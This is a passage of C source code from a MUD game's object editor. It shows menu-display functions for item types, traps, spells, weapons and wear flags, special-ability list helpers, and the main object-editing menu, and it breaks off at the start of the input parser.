1].name; } column_list(d->character, 0, specab_names, NUM_SPECABS - 1, TRUE); write_to_output(d, "\r\n%sEnter weapon special ability : ", nrm); OLC_MODE(d) = OEDIT_WEAPON_SPECAB; } static void oedit_disp_specab_activation_method_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ACTIVATION_METHODS; counter++) { /* added the -3 to prevent eyes/ears/badge */ write_to_output(d, "%s%d%s) %-20.20s %s", grn, counter + 1, nrm, activation_methods[counter], !(++columns % 2) ? "\r\n" : ""); } sprintbit(OLC_SPECAB(d)->activation_method, activation_methods, bits, MAX_STRING_LENGTH); write_to_output(d, "\r\nActivation Methods: %s%s%s\r\n" "Enter Activation Method, 0 to quit : ", cyn, bits, nrm); } void oedit_disp_specab_bane_race(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_RACE_TYPES; counter++) { write_to_output(d, "%s%2d%s) %s%-20.20s %s", grn, counter, nrm, yel, race_family_types[counter], !(++columns % 3) ? "\r\n" : ""); } write_to_output(d, "\r\n%sEnter race number : ", nrm); } void oedit_disp_specab_bane_subrace(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_SUB_RACES; counter++) { write_to_output(d, "%s%2d%s) %s%-20.20s %s", grn, counter, nrm, yel, npc_subrace_types[counter], !(++columns % 3) ? 
"\r\n" : ""); } write_to_output(d, "\r\n%sEnter subrace number : ", nrm); } /* Menu for APPLY_FEAT */ #if 0 void oedit_disp_apply_spec_menu(struct descriptor_data *d) { char *buf; int i, count = 0; switch (OLC_OBJ(d)->affected[OLC_VAL(d)].location) { case APPLY_FEAT: for (i = 0; i < NUM_FEATS; i++) { if (feat_list[i].in_game) { count++; write_to_output(d, "%s%3d%s) %s%-14.14s ", grn, i, nrm, yel, feat_list[i].name); if (count % 4 == 3) write_to_output(d, "\r\n"); } } buf = "\r\nWhat feat should be modified : "; break; /* case APPLY_SKILL: buf = "What skill should be modified : "; break; */ default: oedit_disp_prompt_apply_menu(d); return; } write_to_output(d, "\r\n%s", buf); OLC_MODE(d) = OEDIT_APPLYSPEC; } #endif /* Ask for liquid type. */ static void oedit_liquid_type(struct descriptor_data *d) { get_char_colors(d->character); clear_screen(d); column_list(d->character, 0, drinks, NUM_LIQ_TYPES, TRUE); write_to_output(d, "\r\n%sEnter drink type : ", nrm); OLC_MODE(d) = OEDIT_VALUE_3; } /* The actual apply to set. */ static void oedit_disp_apply_menu(struct descriptor_data *d) { get_char_colors(d->character); clear_screen(d); column_list(d->character, 0, apply_types, NUM_APPLIES, TRUE); write_to_output(d, "\r\nEnter apply type (0 is no apply)\r\n(for 'grant feat' select featnum here, 'featlist' out of editor for master list) : "); OLC_MODE(d) = OEDIT_APPLY; } /* Weapon type. */ /* static void oedit_disp_weapon_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ATTACK_TYPES; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, attack_hit_text[counter].singular, !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter weapon type : "); } */ static void oedit_disp_portaltypes_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_PORTAL_TYPES; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, portal_types[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter portal type : "); } /* ranged combat, weapon-type (like bow vs crossbow) */ static void oedit_disp_ranged_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_RANGED_WEAPONS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, ranged_weapons[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter ranged-weapon type : "); } /* instruments for bardic performance */ static void oedit_disp_instrument_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < MAX_INSTRUMENTS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, instrument_names[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nSelect instrument type : "); } /* ranged combat, missile-type (like arrow vs bolt) */ static void oedit_disp_missile_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_AMMO_TYPES; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, ammo_types[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter missile-weapon type : "); } /* Spell type. 
 */
static void oedit_disp_spells_menu(struct descriptor_data *d)
{
  int counter, columns = 0;

  get_char_colors(d->character);
  clear_screen(d);

  for (counter = 1; counter < NUM_SPELLS; counter++)
  {
    write_to_output(d, "%s%2d%s) %s%-20.20s %s", grn, counter, nrm, yel,
                    spell_info[counter].name, !(++columns % 3) ? "\r\n" : "");
  }
  write_to_output(d, "\r\n%sEnter spell choice (-1 for none) : ", nrm);
}

static void oedit_disp_trap_type(struct descriptor_data *d)
{
  int counter = 0;

  write_to_output(d, "\r\n");
  for (counter = 0; counter < MAX_TRAP_TYPES; counter++)
  {
    write_to_output(d, "%d) %s\r\n", counter, trap_type[counter]);
  }
  write_to_output(d, "\r\n%sEnter trap choice # : ", nrm);
}

static void oedit_disp_trap_effects(struct descriptor_data *d)
{
  int counter = 0;

  write_to_output(d, "\r\n");
  for (counter = TRAP_EFFECT_FIRST_VALUE; counter < TOP_TRAP_EFFECTS; counter++)
  {
    write_to_output(d, "%d) %s\r\n", counter, trap_effects[counter - 1000]);
  }
  write_to_output(d, "\r\n%s(You can also choose any spellnum)\r\n", nrm);
  write_to_output(d, "%sEnter effect # : ", nrm);
}

static void oedit_disp_trap_direction(struct descriptor_data *d)
{
  int counter = 0;

  write_to_output(d, "\r\n");
  for (counter = 0; counter < NUM_OF_INGAME_DIRS; counter++)
  {
    write_to_output(d, "%d) %s\r\n", counter, dirs[counter]);
  }
  write_to_output(d, "\r\n%sEnter direction # : ", nrm);
}

void oedit_disp_armor_type_menu(struct descriptor_data *d)
{
  const char *armor_types[NUM_SPEC_ARMOR_TYPES - 1];
  int i = 0;

  /* we want to use column_list here, but we don't have a pre made list
   * of string values (without undefined). Make one, and make sure it is in order. */
  for (i = 0; i < NUM_SPEC_ARMOR_TYPES - 1; i++)
  {
    armor_types[i] = armor_list[i + 1].name;
  }
  column_list(d->character, 3, armor_types, NUM_SPEC_ARMOR_TYPES - 1, TRUE);
}

void oedit_disp_weapon_type_menu(struct descriptor_data *d)
{
  const char *weapon_types[NUM_WEAPON_TYPES - 1];
  int i = 0;

  /* we want to use column_list here, but we don't have a pre made list
   * of string values (without undefined). Make one, and make sure it is in order. */
  for (i = 0; i < NUM_WEAPON_TYPES - 1; i++)
  {
    weapon_types[i] = weapon_list[i + 1].name;
  }
  column_list(d->character, 3, weapon_types, NUM_WEAPON_TYPES - 1, TRUE);
}

int compute_ranged_weapon_actual_value(int list_value)
{
  int weapon_types[NUM_WEAPON_TYPES];
  int i = 1, counter = 0;

  for (i = 1; i < NUM_WEAPON_TYPES; i++)
  {
    if (IS_SET(weapon_list[i].weaponFlags, WEAPON_FLAG_RANGED))
    {
      weapon_types[counter] = i; /* place weapon type into the array */
      counter++;
    }
  }

  /* look up the requested entry, assuming list_value is a 0-based index
   * into the ranged-weapon list built above; a plain bounds check makes
   * every entry (including the first and last) reachable */
  if (list_value >= 0 && list_value < counter)
    return weapon_types[list_value];

  return -1; /* failed */
}

/*
static void oedit_disp_ranged_weapons_menu(struct descriptor_data *d)
{
  const char *weapon_types[NUM_WEAPON_TYPES];
  int i = 1, counter = 0;

  // we want to use column_list here, but we don't have a pre made list
  // of string values (without undefined). Make one, and make sure it is in order.
  for (i = 1; i < NUM_WEAPON_TYPES; i++)
  {
    if (IS_SET(weapon_list[i].weaponFlags, WEAPON_FLAG_RANGED))
    {
      weapon_types[counter] = weapon_list[i].name;
      counter++;
    }
  }
  column_list(d->character, 3, weapon_types, counter, TRUE);
}
*/

/* Object value #1 */
static void oedit_disp_val1_menu(struct descriptor_data *d)
{
  OLC_MODE(d) = OEDIT_VALUE_1;
  switch (GET_OBJ_TYPE(OLC_OBJ(d)))
  {
  case ITEM_SWITCH:
    write_to_output(d, "What command to activate switch? (0=pull, 1=push) : ");
    break;
  case ITEM_TRAP:
    oedit_disp_trap_type(d);
    break;
  case ITEM_LIGHT:
    /* values 0 and 1 are unused.. jump to 2 */
    oedit_disp_val3_menu(d);
    break;
  case ITEM_SCROLL:
  case ITEM_WAND:
  case ITEM_STAFF:
  case ITEM_POTION:
    write_to_output(d, "Spell level : ");
    break;
  case ITEM_WEAPON:
    /* Weapon Type - Onir */
    oedit_disp_weapon_type_menu(d);
    write_to_output(d, "\r\nChoose a weapon type : ");
    break;
  case ITEM_POISON:
    oedit_disp_spells_menu(d);
    break;
  case ITEM_ARMOR:
  case ITEM_CLANARMOR:
    /* value 0 is reserved for Apply to AC */
    oedit_disp_val2_menu(d);
    break;
  case ITEM_CONTAINER:
  case ITEM_AMMO_POUCH:
    write_to_output(d, "Max weight to contain (-1 for unlimited) : ");
    break;
  case ITEM_DRINKCON:
  case ITEM_FOUNTAIN:
    write_to_output(d, "Max drink units (-1 for unlimited) : ");
    break;
  case ITEM_FOOD:
    write_to_output(d, "Hours to fill stomach : ");
    break;
  case ITEM_MONEY:
    write_to_output(d, "Number of gold coins : ");
    break;
  case ITEM_PORTAL:
    oedit_disp_portaltypes_menu(d);
    break;
  case ITEM_FURNITURE:
    write_to_output(d, "Number of people it can hold : ");
    break;
  /* NewCraft */
  case ITEM_BLUEPRINT:
    write_to_output(d, "Enter Craft ID number : ");
    break;
  case ITEM_FIREWEAPON:
    oedit_disp_ranged_menu(d);
    break;
  case ITEM_MISSILE:
    oedit_disp_missile_menu(d);
    break;
  case ITEM_INSTRUMENT:
    oedit_disp_instrument_menu(d);
    break;
  case ITEM_WORN:
    write_to_output(d, "Special value for worn gear (example gloves for monk-gloves enhancement) : ");
    break;
  case ITEM_BOAT: // these object types have no 'values' so go back to menu
  case ITEM_KEY:
  case ITEM_NOTE:
  case ITEM_OTHER:
  case ITEM_PLANT:
  case ITEM_PEN:
  case ITEM_TRASH:
  case ITEM_TREASURE:
    oedit_disp_menu(d);
    break;
  case ITEM_TREASURE_CHEST:
    oedit_disp_lootbox_levels(d);
    break;
  default:
    mudlog(BRF, LVL_BUILDER, TRUE, "SYSERR: OLC: Reached default case in oedit_disp_val1_menu()!");
    break;
  }
}

/* Object value #2 */
static void oedit_disp_val2_menu(struct descriptor_data *d)
{
  OLC_MODE(d) = OEDIT_VALUE_2;
  switch (GET_OBJ_TYPE(OLC_OBJ(d)))
  {
  case ITEM_SWITCH:
    write_to_output(d, "Which room vnum to manipulate? : ");
    break;
  case ITEM_TRAP:
    switch (GET_OBJ_VAL(OLC_OBJ(d), 0))
    {
    case TRAP_TYPE_OPEN_DOOR:
    case TRAP_TYPE_UNLOCK_DOOR:
      oedit_disp_trap_direction(d);
      break;
    case TRAP_TYPE_OPEN_CONTAINER:
    case TRAP_TYPE_UNLOCK_CONTAINER:
    case TRAP_TYPE_GET_OBJECT:
      write_to_output(d, "VNUM of object trap should apply to : ");
      break;
    case TRAP_TYPE_LEAVE_ROOM:
    case TRAP_TYPE_ENTER_ROOM:
    default:
      write_to_output(d, "Press ENTER to continue.");
      break;
    }
    break;
  case ITEM_SCROLL:
  case ITEM_POTION:
    oedit_disp_spells_menu(d);
    break;
  case ITEM_POISON:
    write_to_output(d, "Level of poison : ");
    break;
  case ITEM_WAND:
  case ITEM_STAFF:
    write_to_output(d, "Max number of charges : ");
    break;
  /* Changed to use standard values for weapons. */
  /*case ITEM_WEAPON:
    write_to_output(d, "Number of damage dice (%d) : ", GET_OBJ_VAL(OLC_OBJ(d), 1));
    break; */
  case ITEM_ARMOR:
    //case ITEM_CLANARMOR:
    /* Armor Type - zusuk */
    oedit_disp_armor_type_menu(d);
    write_to_output(d, "\r\nChoose an armor type : ");
    break;
  case ITEM_FIREWEAPON:
    write_to_output(d, "Number of damage dice : ");
    break;
  case ITEM_MISSILE:
    //write_to_output(d, "Size of damage dice : ");
    break;
  case ITEM_FOOD:
    oedit_disp_spells_menu(d);
    /* Values 2 and 3 are unused, jump to 4...Odd. */
    // oedit_disp_val4_menu(d);
    break;
  case ITEM_AMMO_POUCH:
  case ITEM_CONTAINER:
    /* These are flags, needs a bit of special handling.
*/ oedit_disp_container_flags_menu(d); break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: write_to_output(d, "Initial drink units : "); break; case ITEM_CLANARMOR: write_to_output(d, "Clan ID Number: "); break; case ITEM_INSTRUMENT: write_to_output(d, "Enter how much instrument reduces difficulty (0-30): "); break; case ITEM_PORTAL: switch (GET_OBJ_VAL(OLC_OBJ(d), 0)) { case PORTAL_NORMAL: case PORTAL_CHECKFLAGS: write_to_output(d, "Room VNUM portal points to : "); break; case PORTAL_RANDOM: write_to_output(d, "Lowest room VNUM in range : "); break; /* Always sends player to their own clanhall - no room required */ case PORTAL_CLANHALL: oedit_disp_menu(d); break; } break; case ITEM_TREASURE_CHEST: oedit_disp_lootbox_types(d); break; default: oedit_disp_menu(d); } } /* Object value #3 */ static void oedit_disp_val3_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_VALUE_3; switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SWITCH: write_to_output(d, "Which direction? (0=n, 1=e, 2=s, 3=w, 4=u, 5=d) : "); break; case ITEM_TRAP: oedit_disp_trap_effects(d); break; case ITEM_LIGHT: write_to_output(d, "Number of hours (0 = burnt, -1 is infinite) : "); break; case ITEM_POISON: write_to_output(d, "Applications : "); break; case ITEM_INSTRUMENT: write_to_output(d, "Instrument Level (0-10): "); break; case ITEM_FOOD: /* val 3 is unused, jump to 4 */ oedit_disp_val4_menu(d); break; case ITEM_SCROLL: case ITEM_POTION: oedit_disp_spells_menu(d); break; case ITEM_WAND: case ITEM_STAFF: write_to_output(d, "Number of charges remaining : "); break; /* Use standard values for weapons */ /* case ITEM_WEAPON: write_to_output(d, "Size of damage dice : "); break; */ case ITEM_FIREWEAPON: write_to_output(d, "Breaking probability : "); break; case ITEM_MISSILE: write_to_output(d, "Breaking probability : "); break; case ITEM_CONTAINER: case ITEM_AMMO_POUCH: write_to_output(d, "Vnum of key to open container (-1 for no key) : "); break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: oedit_liquid_type(d); break; case ITEM_PORTAL: switch (GET_OBJ_VAL(OLC_OBJ(d), 0)) { case PORTAL_NORMAL: case PORTAL_CHECKFLAGS: oedit_disp_menu(d); /* We are done for these portal types */ break; case PORTAL_RANDOM: write_to_output(d, "Highest room VNUM in range : "); break; } break; default: oedit_disp_menu(d); } } /* Object value #4 */ static void oedit_disp_val4_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_VALUE_4; switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SWITCH: write_to_output(d, "Which command (0=unhide, 1=unlock, 2=open) : "); break; case ITEM_TRAP: write_to_output(d, "Recommendations:\r\n"); write_to_output(d, "DC = 20 + level-of-trap for a normal trap\r\n"); write_to_output(d, "DC = 30 + level-of-trap for a hard trap\r\n"); write_to_output(d, "DC = 40 + level-of-trap for an epic trap\r\n"); write_to_output(d, "Enter trap difficulty class (DC) : "); break; case ITEM_SCROLL: case ITEM_POTION: case ITEM_WAND: case ITEM_STAFF: oedit_disp_spells_menu(d); break; case ITEM_POISON: write_to_output(d, "Hits per Application : "); break; case ITEM_INSTRUMENT: write_to_output(d, "Instrument Breakability (0 = unbreakable, 2000 = will " "break on first use) (recommended values 0-30): "); break; case ITEM_WEAPON: //oedit_disp_weapon_menu(d); break; case ITEM_MISSILE: //oedit_disp_weapon_menu(d); break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: write_to_output(d, "Spell # (0 = no spell) : "); break; case ITEM_FOOD: write_to_output(d, "Poisoned (0 = not poison) : "); break; default: oedit_disp_menu(d); } } /* Object value #5 */ static void 
oedit_disp_val5_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_VALUE_5; switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_WEAPON: write_to_output(d, "Enhancement bonus : "); break; case ITEM_ARMOR: write_to_output(d, "Enhancement bonus : "); break; case ITEM_MISSILE: write_to_output(d, "Enhancement bonus : "); break; default: oedit_disp_menu(d); } } static void oedit_disp_specab_val1_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_SPECAB_VALUE_1; switch (OLC_SPECAB(d)->ability) { case WEAPON_SPECAB_BANE: oedit_disp_specab_bane_race(d); break; case ITEM_SPECAB_HORN_OF_SUMMONING: write_to_output(d, "Enter the vnum of the mob to summon : "); break; default: OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); } } static void oedit_disp_specab_val2_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_SPECAB_VALUE_2; switch (OLC_SPECAB(d)->ability) { case WEAPON_SPECAB_BANE: oedit_disp_specab_bane_subrace(d); break; default: OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); } } /* Object type. */ static void oedit_disp_type_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ITEM_TYPES; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, item_types[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter object type : "); } // item proficiency /* static void oedit_disp_prof_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ITEM_PROFS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, item_profs[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter object proficiency : "); } */ // item material static void oedit_disp_mats_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_MATERIALS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, material_name[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter object material : "); } /* Object extra flags. */ static void oedit_disp_extra_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ITEM_FLAGS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter + 1, nrm, extra_bits[counter], !(++columns % 2) ? "\r\n" : ""); } sprintbitarray(GET_OBJ_EXTRA(OLC_OBJ(d)), extra_bits, EF_ARRAY_MAX, bits); write_to_output(d, "\r\nObject flags: %s%s%s\r\n" "Enter object extra flag (0 to quit) : ", cyn, bits, nrm); } /* Object perm flags. */ static void oedit_disp_perm_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 1; counter < NUM_AFF_FLAGS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, affected_bits[counter], !(++columns % 2) ? 
"\r\n" : ""); } sprintbitarray(GET_OBJ_PERM(OLC_OBJ(d)), affected_bits, EF_ARRAY_MAX, bits); write_to_output(d, "\r\nObject permanent flags: %s%s%s\r\n" "Enter object perm flag (0 to quit) : ", cyn, bits, nrm); } /* Object size */ void oedit_disp_size_menu(struct descriptor_data *d) { int counter, columns = 0; clear_screen(d); for (counter = 0; counter < NUM_SIZES; counter++) { write_to_output(d, "%2d) %-20.20s%s", counter + 1, size_names[counter], !(++columns % 3) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter object size : "); } /* Object wear flags. */ static void oedit_disp_wear_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ITEM_WEARS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter + 1, nrm, wear_bits[counter], !(++columns % 2) ? "\r\n" : ""); } sprintbitarray(GET_OBJ_WEAR(OLC_OBJ(d)), wear_bits, TW_ARRAY_MAX, bits); write_to_output(d, "\r\nWear flags: %s%s%s\r\n" "Enter wear flag, 0 to quit : ", cyn, bits, nrm); } bool remove_special_ability(struct obj_data *obj, int number) { bool deleted = FALSE; int i; struct obj_special_ability *specab, *prev_specab; specab = obj->special_abilities; prev_specab = NULL; for (i = 1; (i < number) && (specab != NULL); i++) { prev_specab = specab; specab = specab->next; } /* Check to see if we found the ability. */ if ((i == number) && (specab != NULL)) { deleted = TRUE; /* Remove it from the list. */ if (prev_specab == NULL) obj->special_abilities = specab->next; else prev_specab->next = specab->next; /* Free up the memory. */ if (specab->command_word != NULL) free(specab->command_word); free(specab); } return deleted; } struct obj_special_ability *get_specab_by_position(struct obj_data *obj, int position) { int i; struct obj_special_ability *specab, *prev_specab; specab = obj->special_abilities; prev_specab = NULL; for (i = 1; (i < position) && (specab != NULL); i++) { prev_specab = specab; specab = specab->next; } return specab; } /* Display main menu. */ static void oedit_disp_menu(struct descriptor_data *d) { char buf1[MAX_STRING_LENGTH] = {'\0'}; char buf2[MAX_STRING_LENGTH] = {'\0'}; char buf3[MAX_STRING_LENGTH] = {'\0'}; struct obj_data *obj = OLC_OBJ(d); //int i = 0; size_t len = 0; get_char_colors(d->character); clear_screen(d); /* Build buffers for object type */ sprinttype(GET_OBJ_TYPE(obj), item_types, buf1, sizeof(buf1)); /* build buffer for obj extras */ sprintbitarray(GET_OBJ_EXTRA(obj), extra_bits, EF_ARRAY_MAX, buf2); /* Build first half of menu. */ write_to_output(d, "-- Item number : [%s%d%s]\r\n" "%s1%s) Keywords : %s%s\r\n" "%s2%s) S-Desc : %s%s\r\n" "%s3%s) L-Desc :-\r\n%s%s\r\n" "%s4%s) A-Desc :-\r\n%s%s" "%s5%s) Type : %s%s\r\n" //"%sG%s) Proficiency : %s%s\r\n" "%s6%s) Extra flags : %s%s\r\n", cyn, OLC_NUM(d), nrm, grn, nrm, yel, (obj->name && *obj->name) ? obj->name : "undefined", grn, nrm, yel, (obj->short_description && *obj->short_description) ? obj->short_description : "undefined", grn, nrm, yel, (obj->description && *obj->description) ? obj->description : "undefined", grn, nrm, yel, (obj->action_description && *obj->action_description) ? obj->action_description : "Not Set.\r\n", grn, nrm, cyn, buf1, //grn, nrm, cyn, item_profs[GET_OBJ_PROF(obj)], grn, nrm, cyn, buf2); /* Send first half then build second half of menu. 
*/ /* wear slots of gear */ sprintbitarray(GET_OBJ_WEAR(OLC_OBJ(d)), wear_bits, EF_ARRAY_MAX, buf1); /* permanent affections of gear */ sprintbitarray(GET_OBJ_PERM(OLC_OBJ(d)), affected_bits, EF_ARRAY_MAX, buf2); /* build a buffer for displaying suggested worn eq stats -zusuk */ /* we have to fix this so treasure + here are synced! */ if (GET_OBJ_RNUM(obj) != NOTHING) { if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_FINGER)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-finger:wis,will,hp,res-fire,res-punc,res-illus,res-energy] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_NECK)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-neck:int,save-ref,res-cold,res-air,res-force,res-mental,res-water] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_BODY)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-body:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_HEAD)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-head:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_LEGS)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-legs:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_FEET)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-feet:res-poison,dex,moves] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_HANDS)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-hands:res-disease,res-slice,str] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_ARMS)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-arms:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_SHIELD)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-shield:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_ABOUT)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-about:res-acid,cha,res-negative] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_WAIST)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-waist:res-holy,con,res-earth] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_WRIST)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-wrist:save-fort,psp,res-elec,res-unholy,res-sound,res-light] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_WIELD)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-wield:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_HOLD)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-hold:int,cha,hps] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_FACE)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-face:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_AMMO_POUCH)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-ammopouch:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_EAR)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-ear:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_EYES)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-eyes:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_BADGE)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-badge:NONE] "); } /* end eq-wear suggestions */ write_to_output(d, "%s7%s) Wear flags : %s%s\r\n" "%sH%s) Material : %s%s\r\n" "%s8%s) Weight : %s%d\r\n" "%sI%s) Size : %s%s\r\n" "%s9%s) Cost : %s%d\r\n" "%sA%s) Cost/Day : %s%d\r\n" "%sB%s) Timer : %s%d\r\n" "%sC%s) Values : %s%d %d %d %d %d %d %d %d\r\n" " %d %d %d %d %d %d %d %d\r\n" "%sD%s) Applies menu\r\n" "%sE%s) Extra descriptions menu: %s%s%s\r\n" "%sF%s) Weapon Spells : %s%s\r\n" "%sJ%s) Special Abilities : %s%s\r\n" "%sM%s) Min Level : %s%d\r\n" "%sP%s) Perm Affects : %s%s\r\n" "%sS%s) Script : %s%s\r\n" "%sT%s) Spellbook menu\r\n" "%sEQ Rating (save/exit to update, under development): 
%s%d\r\n" "%sSuggested affections (save/exit first): %s%s\r\n" "%sW%s) Copy object\r\n" "%sX%s) Delete object\r\n" "%sQ%s) Quit\r\n" "Enter choice : ", grn, nrm, cyn, buf1, grn, nrm, cyn, material_name[GET_OBJ_MATERIAL(obj)], grn, nrm, cyn, GET_OBJ_WEIGHT(obj), grn, nrm, cyn, size_names[GET_OBJ_SIZE(obj)], grn, nrm, cyn, GET_OBJ_COST(obj), grn, nrm, cyn, GET_OBJ_RENT(obj), grn, nrm, cyn, GET_OBJ_TIMER(obj), grn, nrm, cyn, GET_OBJ_VAL(obj, 0), GET_OBJ_VAL(obj, 1), GET_OBJ_VAL(obj, 2), GET_OBJ_VAL(obj, 3), GET_OBJ_VAL(obj, 4), GET_OBJ_VAL(obj, 5), GET_OBJ_VAL(obj, 6), GET_OBJ_VAL(obj, 7), GET_OBJ_VAL(obj, 8), GET_OBJ_VAL(obj, 9), GET_OBJ_VAL(obj, 10), GET_OBJ_VAL(obj, 11), GET_OBJ_VAL(obj, 12), GET_OBJ_VAL(obj, 13), GET_OBJ_VAL(obj, 14), GET_OBJ_VAL(obj, 15), grn, nrm, grn, nrm, cyn, obj->ex_description ? "Set." : "Not Set.", grn, grn, nrm, cyn, HAS_SPELLS(obj) ? "Set." : "Not set.", grn, nrm, cyn, HAS_SPECIAL_ABILITIES(obj) ? "Set." : "Not Set.", grn, nrm, cyn, GET_OBJ_LEVEL(obj), grn, nrm, cyn, buf2, grn, nrm, cyn, OLC_SCRIPT(d) ? "Set." : "Not Set.", grn, nrm, /* spellbook */ nrm, cyn, (GET_OBJ_RNUM(obj) == NOTHING) ? -999 : get_eq_score(GET_OBJ_RNUM(obj)), /* eq rating */ nrm, cyn, (GET_OBJ_RNUM(obj) == NOTHING) ? "save/exit first" : buf3, /* suggestions */ grn, nrm, /* copy object */ grn, nrm, /* delete object */ grn, nrm /* quite */ ); OLC_MODE(d) = OEDIT_MAIN_MENU; } /* main loop (of sorts).. basically interpreter throws all input to here. */ void oedit_parse(struct descriptor_data *d, char *arg) { int number, min_val; long max_val; char *oldtext = NULL; //int this_missile = -1; 